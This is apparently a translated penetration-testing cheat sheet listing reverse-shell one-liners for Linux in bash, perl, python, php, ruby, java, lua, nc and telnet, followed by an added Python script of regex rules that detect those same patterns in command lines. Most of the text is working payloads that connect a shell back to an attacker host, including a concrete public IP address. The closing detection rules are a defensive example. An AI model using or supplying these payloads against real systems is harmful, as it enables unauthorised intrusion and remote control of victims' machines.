Introduction
During penetration tests one frequently runs into scenarios such as obtaining a reverse shell from a web application or from a database. This article collects the reverse-shell techniques researched by various experts as a cheat sheet.
Contents
- Creating a reverse shell on Linux
- Creating a reverse shell on Windows
Reverse shells on Linux
1. Upload a reverse-shell file (script or trojan)
2. bash
$ /bin/bash -i >& /dev/tcp/<Attackip>/<Attackport> 0>&1
This command has topped the charts in penetration testing for years and is the first choice for a reverse shell, but it fails to run on some systems; it has been verified to work on CentOS.
3. perl
$ perl -e 'use Socket;$i="<Attackip>";$p=<Attackport>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl is an interpreter built into Linux systems; when the bash command cannot spawn a reverse shell, prefer this one.
4. python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attackip>",<Attackport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
5. php
$ php -r '$sock=fsockopen("<Attackip>",<Attackport>);exec("/bin/sh -i <&3 >&3 2>&3");'
6. ruby
$ ruby -rsocket -e'f=TCPSocket.open("<Attackip>",<Attackport>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
7. java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
8. Lua:
lua -e "require('socket');require('os');t=socket.tcp();t:connect('<Attackip>','<Attackport>');os.execute('/bin/sh -i <&3 >&3 2>&3');"
9. nc:
nc -e /bin/sh <Attackip> <Attackport>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Attackip> <Attackport> >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
10. nc
1) Using the -e parameter
2) Without the -e parameter
# Victim
mknod /tmp/backpipe p
# Victim
/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
11. telnet
mknod backpipe p && telnet 173.214.173.151 8080 0<backpipe | /bin/bash 1>backpipe
telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888
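From the defender's side, the one-liners above are easy to spot in process command lines or shell history because each one combines a socket connection with a shell exec. The following added example (not part of the original cheat sheet) turns the patterns listed on this page into heuristic detection rules and runs them over constructed sample command lines; the rule regexes are my own assumptions and will need tuning against real telemetry.

```python
"""Flag reverse-shell command lines using the patterns from the cheat sheet above.
Added defensive example; SAMPLE is constructed, not captured from a real host."""
import re

# Each rule mirrors one technique on the page: bash /dev/tcp redirection,
# nc -e, mkfifo/mknod back-pipes, telnet pipelines, and interpreter
# one-liners that open a socket and then exec a shell.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\S+")),
    ("nc_exec", re.compile(r"\bnc(at)?\b[^|;]*\s-e\s+\S*sh\b")),
    ("fifo_nc", re.compile(r"\b(mkfifo|mknod)\b.*\|\s*(nc|ncat|telnet)\b")),
    ("telnet_pipe_sh", re.compile(r"\btelnet\b.*\|\s*/bin/(ba)?sh")),
    ("perl_socket_exec", re.compile(r"\bperl\b.*\bsocket\(.*\bexec\(")),
    ("python_dup2_sh", re.compile(r"\bpython\d?\b.*\bdup2\(.*/bin/(ba)?sh")),
    ("php_fsockopen_exec", re.compile(r"\bphp\b.*fsockopen\(.*\bexec\(")),
    ("ruby_tcpsocket_exec", re.compile(r"\bruby\b.*TCPSocket.*\bexec\b")),
    ("lua_socket_execute", re.compile(r"\blua\b.*socket\.tcp\(\).*os\.execute\(")),
]


def classify(cmdline):
    """Return the names of every rule that matches the given command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Yield (line_no, cmdline, rule_names) for every line that matches a rule."""
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            yield n, line, hits


# Constructed sample command lines: five taken from the page's techniques
# (with a documentation address filled in) plus two benign ones.
SAMPLE = [
    "/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f",
    "nc -e /bin/sh 192.0.2.10 4444",
    "php -r '$sock=fsockopen(\"192.0.2.10\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "mknod backpipe p && telnet 192.0.2.10 8080 0<backpipe | /bin/bash 1>backpipe",
    "nc -z 10.0.0.5 22",            # benign port check: must not match nc_exec
    "tar czf /tmp/backup.tgz /etc",  # benign
]

if __name__ == "__main__":
    for n, line, hits in scan(SAMPLE):
        print(f"line {n}: {', '.join(hits)} :: {line}")
```

On a live host the same `scan` can be fed `/proc/*/cmdline` contents or shell history; the `nc -e` rule deliberately requires a shell argument so ordinary port probes do not fire.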